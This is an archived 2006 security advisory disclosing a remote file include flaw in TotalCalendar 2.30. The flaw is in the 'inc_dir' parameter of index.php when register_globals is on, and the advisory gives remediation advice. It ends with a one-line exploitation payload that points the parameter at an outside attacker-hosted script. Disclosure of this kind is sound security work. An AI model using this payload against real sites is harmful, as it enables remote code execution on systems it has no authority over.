AOH :: HP Unsorted T :: B06-1823.HTM

Totalcalendar 2.30 - remote file include vulnerability



TotalCalendar 2.30 - Remote File Include Vulnerability
TotalCalendar 2.30 - Remote File Include Vulnerability



[MajorSecurity] TotalCalendar 2.30 - Remote File Include Vulnerability 
--------------------------------------------------------
Software: TotalCalendar
Version: 2.30
Type: Remote File Include Vulnerability
Date: April, 23th 2006
Vendor: SweetPHP
Page: http://sweetphp.com 
Risc: High


Credits:
----------------------------
Discovered by: 'Aesthetico'
http://www.majorsecurity.de 


Affected Products:
----------------------------
TotalCalendar 2.30 and prior


Description:
----------------------------
TotalCalendar is the complete solution for all of your calendar and schedule needs.
TotalCalendar gives you the ability to create multiple calendars 
and allows you to easily share and manage your events online.
The ability to allow user accounts lets you have other calendar members help you manage your events,
users, style, and much more.


Requirements:
----------------------------
register_globals = On


Vulnerability:
----------------------------
Input passed to the "inc_dir" parameter in "index.php" is not
properly verified, before it is used to include files. 
This can be exploited to execute arbitrary code by including files from external resources.


Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.

Set "register_globals" to "Off".


Exploitation:
----------------------------
Post data:
inc_dir=http://www.yourspace.com/yourscript.php? 



The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.